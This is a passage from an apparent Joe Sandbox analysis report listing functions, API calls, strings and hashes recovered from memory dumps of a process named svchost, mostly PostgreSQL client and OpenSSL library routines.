                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$freeisspacemallocstrtol
                                                                                            • String ID: keepalives$keepalives_count$keepalives_idle$keepalives_interval$tcp_user_timeout
                                                                                            • API String ID: 63552027-1152912899
                                                                                            • Opcode ID: 875355ba180783afabd4a6196db407fdff0ee322ac2a27bff548f19ff2c99ec1
                                                                                            • Instruction ID: cffa2ed979224b7fe31daaf30862d8efb7e929fd6c8ca312a73f444469f797f9
                                                                                            • Opcode Fuzzy Hash: 875355ba180783afabd4a6196db407fdff0ee322ac2a27bff548f19ff2c99ec1
                                                                                            • Instruction Fuzzy Hash: CD516D26A0AB8182FA55CF28C5143E82361FF85BA4F1CA331DF6C27797DF39A5958314
                                                                                            Function 00007FFDA36E7910 Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 103stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$freelibintl_dgettextmallocmemcpystrchr
                                                                                            • String ID: SSL certificate's name contains embedded null$host name must be specified$out of memory
                                                                                            • API String ID: 2838870048-2356389534
                                                                                            • Opcode ID: f8446b34112ac1ad8bcd576494ba1a3eb4ecc207a5f52c03c371f3954c2f2266
                                                                                            • Instruction ID: fbfed57a9cabd61db4043c0725cbd585af258dd8fff07e99c862c240d829bb68
                                                                                            • Opcode Fuzzy Hash: f8446b34112ac1ad8bcd576494ba1a3eb4ecc207a5f52c03c371f3954c2f2266
                                                                                            • Instruction Fuzzy Hash: 0141B221B0EB4241FA219F59A4201F87792BF05BA0F6C2631DA5C277D6DF7EE659C304
                                                                                            Function 00007FFDA36F5FA0 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 103stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • strstr.VCRUNTIME140(?,disable,00000000,00007FFDA36F5F6D,?,?,00000000,00007FFDA36F4A43,require,?,?,00007FFDA36D7C74), ref: 00007FFDA36F5FF0
                                                                                            • strstr.VCRUNTIME140(?,disable,00000000,00007FFDA36F5F6D,?,?,00000000,00007FFDA36F4A43,require,?,?,00007FFDA36D7C74), ref: 00007FFDA36F6013
                                                                                            • memcpy.VCRUNTIME140(?,disable,00000000,00007FFDA36F5F6D,?,?,00000000,00007FFDA36F4A43,require,?,?,00007FFDA36D7C74), ref: 00007FFDA36F60BB
                                                                                            • memcpy.VCRUNTIME140(?,disable,00000000,00007FFDA36F5F6D,?,?,00000000,00007FFDA36F4A43,require,?,?,00007FFDA36D7C74), ref: 00007FFDA36F60CA
                                                                                            • memcpy.VCRUNTIME140(?,disable,00000000,00007FFDA36F5F6D,?,?,00000000,00007FFDA36F4A43,require,?,?,00007FFDA36D7C74), ref: 00007FFDA36F60E2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$strstr
                                                                                            • String ID: disable$require
                                                                                            • API String ID: 3434740875-4247959637
                                                                                            • Opcode ID: 8cf88959986718156906a1f41982db4781af94d4a21a5be8503427c14f86c484
                                                                                            • Instruction ID: 9835dd93f5e719643c67a3323c52fe68473259e70f35b7f62ac45a3994854d5f
                                                                                            • Opcode Fuzzy Hash: 8cf88959986718156906a1f41982db4781af94d4a21a5be8503427c14f86c484
                                                                                            • Instruction Fuzzy Hash: C8312622B0BB8186FB55CB1596202B9A762FB15BC0F1C6539DE4E2374ADF3EE041C304
                                                                                            Function 00007FFDA36D2426 Relevance: 10.6, APIs: 3, Strings: 4, Instructions: 98COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$malloc
                                                                                            • String ID: could not encrypt password: %s$fe_sendauth: error sending password authentication$fe_sendauth: no password supplied$out of memory
                                                                                            • API String ID: 2190258309-2372536895
                                                                                            • Opcode ID: a70327720f6d7fc06b7bbb70a404fd256294a0b92721834c3d629fed90484baf
                                                                                            • Instruction ID: 50cb620d2592387da69c851d7a7d24998daecd55ee6f3b6368ffe2a456b3db9c
                                                                                            • Opcode Fuzzy Hash: a70327720f6d7fc06b7bbb70a404fd256294a0b92721834c3d629fed90484baf
                                                                                            • Instruction Fuzzy Hash: 8F41B322B0AA4295FA649B15E4606F96352FB45BE4F582231CF2D237D3DF2EE546C308
                                                                                            Function 00007FFDA36EDDB0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 98COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: freemallocmemcpy$R_clear_errorlibintl_gettext
                                                                                            • String ID: out of memory
                                                                                            • API String ID: 2345935813-2599737071
                                                                                            • Opcode ID: 4b0df2c565e75c284d1b8c0ccc761c5961d104eb9a9d2f1ad5d828e460f74820
                                                                                            • Instruction ID: 4f8d958a58b5c51ef139f962c5d65dcf307dcf03318cffb58572a5828df99b43
                                                                                            • Opcode Fuzzy Hash: 4b0df2c565e75c284d1b8c0ccc761c5961d104eb9a9d2f1ad5d828e460f74820
                                                                                            • Instruction Fuzzy Hash: 9C31AF22B0BB4645FA10EB12A8356B926526F55FD4F4C6131EE1E673C7EE3EE0098308
                                                                                            Function 00007FFDA3665380 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 95COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: R_newR_set_debug
                                                                                            • String ID: ssl\record\methods\tls13_meth.c$tls13_add_record_padding
                                                                                            • API String ID: 193678381-2980714504
                                                                                            • Opcode ID: 67d9a1e3e754e3a4fe518b5f32cc3468fd2d591aeb2d7c82136290c08ffe844d
                                                                                            • Instruction ID: 462caed1f0a959ad868be651c37810629946483657fb7203e7f326c6fc277714
                                                                                            • Opcode Fuzzy Hash: 67d9a1e3e754e3a4fe518b5f32cc3468fd2d591aeb2d7c82136290c08ffe844d
                                                                                            • Instruction Fuzzy Hash: 7931C121B0E69283FB589B2294613E96693AF94BC0F0CA471DF5C67787DF2EE5608214
                                                                                            Function 00007FFDA3674420 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 91COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: R_newR_set_debug
                                                                                            • String ID: ssl\statem\extensions_srvr.c$tls_construct_stoc_status_request
                                                                                            • API String ID: 193678381-1174127863
                                                                                            • Opcode ID: 69967520ab07d786b5007b022920560fe12736c1b069c0e31d578238edd2043d
                                                                                            • Instruction ID: 05eb51092c81959fea0cb86795470e2184172bb381a42533964c20f6d5e7149a
                                                                                            • Opcode Fuzzy Hash: 69967520ab07d786b5007b022920560fe12736c1b069c0e31d578238edd2043d
                                                                                            • Instruction Fuzzy Hash: 8C31F661F1E14242F7968715E5AA7B92392EF447C4F9C6031EA0C937D7DF2ED8818708
                                                                                            Function 00007FFDA36DFED0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 81COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$libintl_dgettext
                                                                                            • String ID: %s not allowed in pipeline mode$PQsendQuery$command string is a null pointer$show password_encryption
                                                                                            • API String ID: 2163055111-3415876621
                                                                                            • Opcode ID: 2fc157f76cac9ed13452ab7c5aec64b4437422d02c5ae8174f9a0550526bae77
                                                                                            • Instruction ID: fd49de970066cc25d8a99eced937d3d3c3d6dbc2cec3ecd5923cf90447b6b2dc
                                                                                            • Opcode Fuzzy Hash: 2fc157f76cac9ed13452ab7c5aec64b4437422d02c5ae8174f9a0550526bae77
                                                                                            • Instruction Fuzzy Hash: 0B319922B0AA4285FA449F16F5603A96392EF487C4F4C6432EF0D5F797DF2ED0948708
                                                                                            Function 00007FFDA36EA020 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • could not send data to server: %s, xrefs: 00007FFDA36EA0D8
                                                                                            • server closed the connection unexpectedlyThis probably means the server terminated abnormallybefore or while processing the request., xrefs: 00007FFDA36EA0FE
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLastR_clear_errorR_get_error
                                                                                            • String ID: could not send data to server: %s$server closed the connection unexpectedlyThis probably means the server terminated abnormallybefore or while processing the request.
                                                                                            • API String ID: 2061372100-3185302654
                                                                                            • Opcode ID: f71a0201ed2f93dc30e78459b94b2cdd1b1b939d3de1c0ee11a05d597a034dcb
                                                                                            • Instruction ID: dc1cdcdb480a7b00cd70e877ae15bb00dd4c95623979e7c7471ad2efc5c9304c
                                                                                            • Opcode Fuzzy Hash: f71a0201ed2f93dc30e78459b94b2cdd1b1b939d3de1c0ee11a05d597a034dcb
                                                                                            • Instruction Fuzzy Hash: 8C31DD25B1BAC241F6609724E4343FA2692BF85B85F5C1035DA4C677D7DE3EE10AC708
                                                                                            Function 00007FFDA36EAB34 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 74COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fputc
                                                                                            • String ID: "%s"$ %d$ NNNN$Parse$mismatched message length: consumed %d, expected %d
                                                                                            • API String ID: 1992160199-3213124284
                                                                                            • Opcode ID: 9e1f6f89a83819611208f11f02b220badd6a7350036da421f155b2d4807d85c9
                                                                                            • Instruction ID: 36dfe8f2d687369f15999baddbff371d8604e2239e7d6f280e3c426cd930358f
                                                                                            • Opcode Fuzzy Hash: 9e1f6f89a83819611208f11f02b220badd6a7350036da421f155b2d4807d85c9
                                                                                            • Instruction Fuzzy Hash: 322191A1B1B65641FA10DB15E4A16B81363EF407C8F487231DD0E27387DE6FE549D308
                                                                                            Function 00007FFDA36EA280 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73networkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            • could not send data to server: %s, xrefs: 00007FFDA36EA31E
                                                                                            • server closed the connection unexpectedlyThis probably means the server terminated abnormallybefore or while processing the request., xrefs: 00007FFDA36EA344
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$_strdupsend
                                                                                            • String ID: could not send data to server: %s$server closed the connection unexpectedlyThis probably means the server terminated abnormallybefore or while processing the request.
                                                                                            • API String ID: 4220554821-3185302654
                                                                                            • Opcode ID: fd3771ac3c9e00c962aabd381d91c46ee957a6d18d2fd4c51b92376f32d7113e
                                                                                            • Instruction ID: 5f15633991a638db5d355d9d0ec18d4e446a2fdac73a055439766b6ac499c9d2
                                                                                            • Opcode Fuzzy Hash: fd3771ac3c9e00c962aabd381d91c46ee957a6d18d2fd4c51b92376f32d7113e
                                                                                            • Instruction Fuzzy Hash: 7D31DB11B1BA8245FA219725E4243FA2253AF89784F9C1031DE4DA77D7DE3EE14AC708
                                                                                            Function 00007FFDA36DA810 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 73stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDA36D6A42,?,?,?,00007FFDA36D3380), ref: 00007FFDA36DA836
                                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDA36D6A42,?,?,?,00007FFDA36D3380), ref: 00007FFDA36DA850
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFDA36D6A42,?,?,?,00007FFDA36D3380), ref: 00007FFDA36DA8B4
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFDA36D6A42,?,?,?,00007FFDA36D3380), ref: 00007FFDA36DA8E8
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFDA36D6A42,?,?,?,00007FFDA36D3380), ref: 00007FFDA36DA8FC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$strncmp
                                                                                            • String ID: postgres://$postgresql://
                                                                                            • API String ID: 2582455447-2050216600
                                                                                            • Opcode ID: 0b96a70d8e5ce64e49a8001619f6b522e121ba2cee285d0aad116d79a6df67a7
                                                                                            • Instruction ID: 135d7720b9351e977c6251d74030a4924af8cbd6fc61f8e8931254155152f450
                                                                                            • Opcode Fuzzy Hash: 0b96a70d8e5ce64e49a8001619f6b522e121ba2cee285d0aad116d79a6df67a7
                                                                                            • Instruction Fuzzy Hash: 61312D22B1EE5281FB509B12E5603B96352EB49BC4F4C2031DE4E6B796DF3ED881C748
                                                                                            Function 00007FFDA36EB490 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: isprint
                                                                                            • String ID: "%s"$ "SSSS"$ %c$ \x%02x$%s
                                                                                            • API String ID: 3707773532-2909481662
                                                                                            • Opcode ID: 61c18fc8364e6b8451701bf3c71c6be493a848bc41b1a039f9b57a604ffcc4c5
                                                                                            • Instruction ID: e63b6dd4a20c06a89df637281f1cb65819cf5485d8852824b291379851adb6ed
                                                                                            • Opcode Fuzzy Hash: 61c18fc8364e6b8451701bf3c71c6be493a848bc41b1a039f9b57a604ffcc4c5
                                                                                            • Instruction Fuzzy Hash: 1931C07270A68286F710CF11E8A027A7762EB40BD5F0C6235DB6A1739ADE7DE164C748
                                                                                            Function 00007FFDA36D40E2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69networkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$getsocknamegetsockopt
                                                                                            • String ID: could not get client address from socket: %s$could not get socket error status: %s
                                                                                            • API String ID: 332088430-1479310242
                                                                                            • Opcode ID: a0ca23f1ef8d962aaa07ecf870553447d7bea091005cfd7051242a6258a68f38
                                                                                            • Instruction ID: a096b427c0a09955efc810084bf530bccf47207fb34c405fde5dac74ff2ebd86
                                                                                            • Opcode Fuzzy Hash: a0ca23f1ef8d962aaa07ecf870553447d7bea091005cfd7051242a6258a68f38
                                                                                            • Instruction Fuzzy Hash: 6531AF2270AA8281FB418F25D0252ED2362FF45788F582132CE5D2B79ADF3EE5458754
                                                                                            Function 00007FFDA36E9F20 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 65networkCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            • server closed the connection unexpectedlyThis probably means the server terminated abnormallybefore or while processing the request., xrefs: 00007FFDA36E9FD3
                                                                                            • could not receive data from server: %s, xrefs: 00007FFDA36E9FC2
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$L_get_errorR_clear_errorR_get_errorrecv
                                                                                            • String ID: could not receive data from server: %s$server closed the connection unexpectedlyThis probably means the server terminated abnormallybefore or while processing the request.
                                                                                            • API String ID: 3938477122-737636320
                                                                                            • Opcode ID: 436409de14f033de0cdc6b93a3e0c5de171e81197e83066652ac92ef7f89ac72
                                                                                            • Instruction ID: f11ae98f9dc06f4fdd610e042028087ea0c72b9231310f6429c7c8640673e2fd
                                                                                            • Opcode Fuzzy Hash: 436409de14f033de0cdc6b93a3e0c5de171e81197e83066652ac92ef7f89ac72
                                                                                            • Instruction Fuzzy Hash: C721C521B0F64241FA655766E8743BA16C36F48B94F5C6136CE0D27B97DE2EE409830C
                                                                                            Function 00007FFDA36EA190 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 61networkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • WSASetLastError.WS2_32 ref: 00007FFDA36EA1BE
                                                                                            • recv.WS2_32 ref: 00007FFDA36EA1D4
                                                                                            • WSAGetLastError.WS2_32 ref: 00007FFDA36EA1E1
                                                                                              • Part of subcall function 00007FFDA36EC450: LoadLibraryExA.KERNEL32(?,?,?,?,?,?,?,00007FFDA36EA0D8), ref: 00007FFDA36EC4CF
                                                                                              • Part of subcall function 00007FFDA36EC450: FormatMessageA.KERNEL32(?,?,?,?,?,?,?,00007FFDA36EA0D8), ref: 00007FFDA36EC516
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,-00000001,00007FFDA36D15B3), ref: 00007FFDA36E2D89
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36E2DB1
                                                                                              • Part of subcall function 00007FFDA36E2D70: libintl_dgettext.LIBINTL-9 ref: 00007FFDA36E2DD2
                                                                                            • WSASetLastError.WS2_32 ref: 00007FFDA36EA241
                                                                                            Strings
                                                                                            • server closed the connection unexpectedlyThis probably means the server terminated abnormallybefore or while processing the request., xrefs: 00007FFDA36EA22C
                                                                                            • could not receive data from server: %s, xrefs: 00007FFDA36EA21B
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$_errno$FormatLibraryLoadMessagelibintl_dgettextrecv
                                                                                            • String ID: could not receive data from server: %s$server closed the connection unexpectedlyThis probably means the server terminated abnormallybefore or while processing the request.
